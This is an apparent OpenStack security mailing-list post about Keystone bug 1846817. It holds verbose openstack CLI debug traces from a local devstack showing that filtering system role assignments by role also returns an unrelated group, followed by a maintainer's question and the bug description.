u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} defaults: {u'auth_type': 'password', u'status': u'active', u'image_status_code_retries': 5, u'baremetal_introspection_status_code_retries': 5, 'api_timeout': None, 'cacert': None, u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': u'public', u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', u'baremetal_status_code_retries': 5, 'verify': True, 'cert': None, u'secgroup_source': u'neutron', u'object_store_api_version': u'1', u'disable_vendor_agent': {}} cloud cfg: {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} compute API version 2.1, cmd group openstack.compute.v2 network API version 2, cmd group openstack.network.v2 image API version 2, cmd group openstack.image.v2 volume API version 3, cmd group openstack.volume.v3 identity API version 3, cmd group openstack.identity.v3 object_store API version 1, cmd group openstack.object_store.v1 key_manager API version 1, cmd group openstack.key_manager.v1 Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} command: role assignment list -> openstackclient.identity.v3.role_assignment.ListRoleAssignment (auth=True) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'timing': False, 'additional_user_agent': [('osc-lib', '1.13.0')], u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': 'public', 'cacert': None, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'disable_vendor_agent': {}} Using auth plugin: password Using parameters {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'} Get auth_ref REQ: curl -g -i -X GET http://10.0.3.122/identity -H "Accept: application/json" -H "User-Agent: openstacksdk/0.34.0 keystoneauth1/3.17.0 python-requests/2.22.0 CPython/2.7.15+" Starting new HTTP connection (1): 10.0.3.122:80 http://10.0.3.122:80 "GET /identity HTTP/1.1" 300 269 RESP: [300] Connection: close Content-Length: 269 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:29 GMT Location: http://10.0.3.122/identity/v3/ Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-f35dcb91-9d9f-4c85-9421-1600e6a6ec27 RESP BODY: {"versions": {"values": [{"status": "stable", "updated": "2019-07-19T00:00:00Z", "media-types": [{"base": "application/json", "type": "application/vnd.openstack.identity-v3+json"}], "id": "v3.13", "links": [{"href": "http://10.0.3.122/identity/v3/", "rel": "self"}]}]}} GET call to http://10.0.3.122/identity used request id req-f35dcb91-9d9f-4c85-9421-1600e6a6ec27 Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "system": {"all": true}, "expires_at": "2019-10-04T19:56:29.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45"}], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "keystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["JVQCRxBoTUyzm2CqiCoj6w"], "issued_at": "2019-10-04T18:56:29.000000Z"}} run(Namespace(authproject=False, authuser=False, columns=[], domain=None, effective=False, fit_width=False, formatter='table', group=None, group_domain=None, inherited=False, max_width=0, names=True, noindent=False, print_empty=False, project=None, project_domain=None, quote_mode='nonnumeric', role=None, role_domain=None, sort_columns=[], system=u'all', user=None, user_domain=None)) Instantiating identity client: Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "system": {"all": true}, "expires_at": "2019-10-04T19:56:29.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45"}], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "keystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["U9Z3md9YTP-9-bTLuPDIzg"], "issued_at": "2019-10-04T18:56:29.000000Z"}} REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}042443671367aa0183e15fd2692bf4c70d15050bdac46db883fd836440ae1065" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/role_assignments?scope.system=all&include_names=True HTTP/1.1" 200 2401 RESP: [200] Connection: close Content-Length: 2401 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:29 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-c9bf133b-7ec4-49a5-b9da-3185dc6c55d2 RESP BODY: {"role_assignments": [{"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "c814cd4739bd4960ad08ade3814f1560", "name": "system-admins"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/c814cd4739bd4960ad08ade3814f1560/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "dd97034049fd46a6bdb33a32f1c7759e", "name": "system-auditors"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/dd97034049fd46a6bdb33a32f1c7759e/roles/7ee093f4ccf345bba963ce765f9b797f"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0ec0eb48c66d4fb79c432a2ff8c5d257", "name": "admin"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0ec0eb48c66d4fb79c432a2ff8c5d257/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0f75914e63cb46e795cae7e6facd0ecb", "name": "operator"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0f75914e63cb46e795cae7e6facd0ecb/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "66256692b6b942a8814ffd87d32a3963", "name": "system-support"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/66256692b6b942a8814ffd87d32a3963/roles/a8cd98f2e98d4135b2fa83950d6171ec"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "e8fec49e15984aedb5e1235f279434fe", "name": "auditor"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/e8fec49e15984aedb5e1235f279434fe/roles/7ee093f4ccf345bba963ce765f9b797f"}}], "links": {"self": "http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True", "previous": null, "next": null}} GET call to identity for http://10.0.3.122/identity/v3/role_assignments?scope.system=all&include_names=True used request id req-c9bf133b-7ec4-49a5-b9da-3185dc6c55d2 +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | Role | User | Group | Project | Domain | System | Inherited | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | admin | | system-admins at Default | | | all | False | | reader | | system-auditors at Default | | | all | False | | admin | admin at Default | | | | all | False | | admin | operator at Default | | | | all | False | | member | system-support at Default | | | | all | False | | reader | auditor at Default | | | | all | False | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ clean_up ListRoleAssignment: END return value: 0 The Trace above lists all system role assignments to confirm my setup locally. The following trace shows that the group is returned with the wrong role assignment based on the filter. $ openstack role assignment list --names --system all --role member --debug [1/880] START with options: role assignment list --names --system all --role member --debug options: Namespace(access_key='', access_secret='***', access_token='***', access_token_endpoint='', access_token_type='', application_credential_id='', application_credential_name='', application_credential_secret='***', auth_methods='',  auth_type='', auth_url='', cacert=None, cert='', client_id='', client_secret='***', cloud='devstack-system-admin', code='', consumer_key='', consumer_secret='***', debug=True, default_domain='default', default_domain_id='', default_domai n_name='', deferred_help=False, discovery_endpoint='', domain_id='', domain_name='', endpoint='', identity_provider='', identity_provider_url='', insecure=None, interface='public', key='', log_file=None, openid_scope='', os_beta_command=F alse, os_compute_api_version='', os_identity_api_version='', os_image_api_version='', os_key_manager_api_version='1', os_network_api_version='', os_object_api_version='', os_project_id=None, os_project_name=None, os_volume_api_version='',  passcode='', password='***', profile='', project_domain_id='', project_domain_name='', project_id='', project_name='', protocol='', redirect_uri='', region_name='', remote_project_domain_id='', remote_project_domain_name='', remote_proje ct_id='', remote_project_name='', service_provider='', service_provider_endpoint='', service_provider_entity_id='', system_scope='', timing=False, token='***', trust_id='', url='', user_domain_id='', user_domain_name='', user_id='', usern ame='', verbose_level=3, verify=None) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} defaults: {u'auth_type': 'password', u'status': u'active', u'image_status_code_retries': 5, u'baremetal_introspection_status_code_retries': 5, 'api_timeout': None, 'cacert': None, u'image_api_use_tasks': False, u'floating_ip_source': u'ne utron', 'key': None, u'interface': u'public', u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', u'baremetal_status_code_retries': 5, 'verify': True, 'cert': None, u'secgroup_source': u'neutron', u'object_store_api_ version': u'1', u'disable_vendor_agent': {}} cloud cfg: {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-admin', 've rify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interfa ce': 'public', u'disable_vendor_agent': {}} compute API version 2.1, cmd group openstack.compute.v2 network API version 2, cmd group openstack.network.v2 image API version 2, cmd group openstack.image.v2 volume API version 3, cmd group openstack.volume.v3 identity API version 3, cmd group openstack.identity.v3 object_store API version 1, cmd group openstack.object_store.v1 key_manager API version 1, cmd group openstack.key_manager.v1 Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'cacert': None, u'network_api_version': u'2', u'message': u'', u'image_format': u'qcow2', 'networks': [], 'cloud': 'devstack-system-ad min', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_timeout': None, 'auth': {'username': 'admin', 'system _scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tasks': False, u'floating_ip_source': u'neutron', 'key ': None, 'timing': False, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_help': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'interface': 'public', u'disable_vendor_agent': {}} command: role assignment list -> openstackclient.identity.v3.role_assignment.ListRoleAssignment (auth=True) Auth plugin password selected auth_config_hook(): {'auth_type': 'password', 'beta_command': False, u'image_status_code_retries': '5', 'timing': False, 'additional_user_agent': [('osc-lib', '1.13.0')], u'network_api_version': u'2', u'message': u'', u'image_format': u'q cow2', 'networks': [], 'cloud': 'devstack-system-admin', 'verify': True, u'object_store_api_version': u'1', u'status': u'active', 'verbose_level': 3, 'region_name': 'RegionOne', u'baremetal_introspection_status_code_retries': '5', 'api_ti meout': None, 'auth': {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'}, 'default_domain': 'default', u'image_api_use_tas ks': False, u'floating_ip_source': u'neutron', 'key': None, u'interface': 'public', 'cacert': None, 'key_manager_api_version': '1', u'baremetal_status_code_retries': '5', 'identity_api_version': '3', 'volume_api_version': '3', 'deferred_h elp': False, 'cert': None, u'secgroup_source': u'neutron', 'debug': True, u'disable_vendor_agent': {}} Using auth plugin: password Using parameters {'username': 'admin', 'system_scope': 'all', 'user_domain_id': 'default', 'auth_url': 'http://10.0.3.122/identity', 'password': '***', 'project_domain_id': 'default'} Get auth_ref REQ: curl -g -i -X GET http://10.0.3.122/identity -H "Accept: application/json" -H "User-Agent: openstacksdk/0.34.0 keystoneauth1/3.17.0 python-requests/2.22.0 CPython/2.7.15+" Starting new HTTP connection (1): 10.0.3.122:80 http://10.0.3.122:80 "GET /identity HTTP/1.1" 300 269 RESP: [300] Connection: close Content-Length: 269 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:49 GMT Location: http://10.0.3.122/identity/v3/ Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-d5 784d4c-7b47-4647-b912-65e6a78b835e RESP BODY: {"versions": {"values": [{"status": "stable", "updated": "2019-07-19T00:00:00Z", "media-types": [{"base": "application/json", "type": "application/vnd.openstack.identity-v3+json"}], "id": "v3.13", "links": [{"href": "http://10. 0.3.122/identity/v3/", "rel": "self"}]}]}} GET call to http://10.0.3.122/identity used request id req-d5784d4c-7b47-4647-b912-65e6a78b835e Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "syste m": {"all": true}, "expires_at": "2019-10-04T19:56:49.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45" }], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321 893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "ke ystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["SGRaWT8BTVuzELGwxqjBdg"], "issued_at": "2019-10-04T18:56:49.000000 Z"}} run(Namespace(authproject=False, authuser=False, columns=[], domain=None, effective=False, fit_width=False, formatter='table', group=None, group_domain=None, inherited=False, max_width=0, names=True, noindent=False, print_empty=False, pro ject=None, project_domain=None, quote_mode='nonnumeric', role=u'member', role_domain=None, sort_columns=[], system=u'all', user=None, user_domain=None)) Instantiating identity client: Making authentication request to http://10.0.3.122/identity/v3/auth/tokens Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "POST /identity/v3/auth/tokens HTTP/1.1" 201 1194 {"token": {"methods": ["password"], "roles": [{"id": "7a11d0ba747046d7936fbb8f97dc5cb1", "name": "admin"}, {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}], "syste m": {"all": true}, "expires_at": "2019-10-04T19:56:50.000000Z", "catalog": [{"endpoints": [{"url": "http://10.0.3.122/image", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "279159944f0843179bb376b4a7ac5c45" }], "type": "image", "id": "24305f1e70ec474d895e409f4b339f18", "name": "glance"}, {"endpoints": [{"url": "http://10.0.3.122/identity", "interface": "admin", "region": "RegionOne", "region_id": "RegionOne", "id": "5ba5cca8ad654f5ea9d633321 893d620"}, {"url": "http://10.0.3.122/identity", "interface": "public", "region": "RegionOne", "region_id": "RegionOne", "id": "f3b136a56d1a4839bd1bc50a070f8f86"}], "type": "identity", "id": "da3d368b566b4a9686ddadbb64004c26", "name": "ke ystone"}], "user": {"domain": {"id": "default", "name": "Default"}, "password_expires_at": null, "name": "admin", "id": "0ec0eb48c66d4fb79c432a2ff8c5d257"}, "audit_ids": ["2nu0u-1wQRmWA9_uS2hZ-g"], "issued_at": "2019-10-04T18:56:50.000000 Z"}} REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/roles/member -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/roles/member HTTP/1.1" 404 84 RESP: [404] Connection: close Content-Length: 84 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-88bce424-60f2-4d2a-a6f5-2bd256602789 RESP BODY: {"error":{"code":404,"message":"Could not find role: member.","title":"Not Found"}} GET call to identity for http://10.0.3.122/identity/v3/roles/member used request id req-88bce424-60f2-4d2a-a6f5-2bd256602789 Request returned failure status: 404 REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/roles?name=member -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/roles?name=member HTTP/1.1" 200 322 RESP: [200] Connection: close Content-Length: 322 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-ce429b68-b53d-4c49-9080-ed3da3bce55b RESP BODY: {"links": {"self": "http://10.0.3.122/identity/v3/roles?name=member", "previous": null, "next": null}, "roles": [{"description": null, "links": {"self": "http://10.0.3.122/identity/v3/roles/a8cd98f2e98d4135b2fa83950d6171ec"}, " options": {}, "id": "a8cd98f2e98d4135b2fa83950d6171ec", "domain_id": null, "name": "member"}]} GET call to identity for http://10.0.3.122/identity/v3/roles?name=member used request id req-ce429b68-b53d-4c49-9080-ed3da3bce55b REQ: curl -g -i -X GET http://10.0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True -H "Accept: application/json" -H "User-Agent: python-keystoneclient" -H "X-Auth-Token: {SHA 256}cb5bcba8735c5a7ea6f80ea414ee306e1a0b6a9c0c39c4dbf1296a96f6516ab6" Resetting dropped connection: 10.0.3.122 http://10.0.3.122:80 "GET /identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True HTTP/1.1" 200 1328 RESP: [200] Connection: close Content-Length: 1328 Content-Type: application/json Date: Fri, 04 Oct 2019 18:56:50 GMT Server: Apache/2.4.29 (Ubuntu) Vary: X-Auth-Token x-openstack-request-id: req-08f9bdb9-149d-4905-96cc-99b87c8b6339 RESP BODY: {"role_assignments": [{"scope": {"system": {"all": true}}, "role": {"id": "7ee093f4ccf345bba963ce765f9b797f", "name": "reader"}, "group": {"domain": {"id": "default", "name": "Default"}, "id": "dd97034049fd46a6bdb33a32f1c7759e" , "name": "system-auditors"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/groups/dd97034049fd46a6bdb33a32f1c7759e/roles/7ee093f4ccf345bba963ce765f9b797f"}}, {"scope": {"system": {"all": true}}, "role": {"id": "7a11d0ba74 7046d7936fbb8f97dc5cb1", "name": "admin"}, "user": {"domain": {"id": "default", "name": "Default"}, "id": "0f75914e63cb46e795cae7e6facd0ecb", "name": "operator"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/0f75914 e63cb46e795cae7e6facd0ecb/roles/7a11d0ba747046d7936fbb8f97dc5cb1"}}, {"scope": {"system": {"all": true}}, "role": {"id": "a8cd98f2e98d4135b2fa83950d6171ec", "name": "member"}, "user": {"domain": {"id": "default", "name": "Default"}, "id":  "66256692b6b942a8814ffd87d32a3963", "name": "system-support"}, "links": {"assignment": "http://10.0.3.122/identity/v3/system/users/66256692b6b942a8814ffd87d32a3963/roles/a8cd98f2e98d4135b2fa83950d6171ec"}}], "links": {"self": "http://10. 0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True", "previous": null, "next": null}} GET call to identity for http://10.0.3.122/identity/v3/role_assignments?scope.system=all&role.id=a8cd98f2e98d4135b2fa83950d6171ec&include_names=True used request id req-08f9bdb9-149d-4905-96cc-99b87c8b6339 +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | Role | User | Group | Project | Domain | System | Inherited | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ | reader | | system-auditors at Default | | | all | False | | admin | operator at Default | | | | all | False | | member | system-support at Default | | | | all | False | +--------+------------------------+-------------------------+---------+--------+--------+-----------+ clean_up ListRoleAssignment: END return value: 0 To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1846817/+subscriptions From colleen at gazlene.net Fri Oct 4 21:28:40 2019 From: colleen at gazlene.net (Colleen Murphy) Date: Fri, 04 Oct 2019 21:28:40 -0000 Subject: [Openstack-security] [Bug 1846817] Re: v3/role_assignments filtering exposes unnecessary role assignments References: <157021550823.969.5501239713217750813.malonedeb@chaenomeles.canonical.com> Message-ID: <157022452049.22931.11303906822352456167.malone@gac.canonical.com> Can you say whether this is new in Train, or present since Stein? If it is new in Train, we should try to correct it ASAP before the final release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1846817 Title: v3/role_assignments filtering exposes unnecessary role assignments Status in OpenStack Identity (keystone): Triaged Status in OpenStack Security Advisory: Won't Fix Bug description: I have a deployment that exercises multiple system role assignments:  - An "operator" user has the "admin" role on the system  - A "system-support" user has the "member" role on the system  - A "system-admins" group has the "reader" role on the system If I ask keystone to filter a list of role assignments by --system all and --role member, I should only see a list with the "system-support" user and the "operator" user. Instead, I get a list with three entries that includes the group, which doesn't have the member role at all, it only has reader. Depending on how you classify this, it could leak information to clients. Groups don't appear to be filtered from the list since "reader" doesn't imply 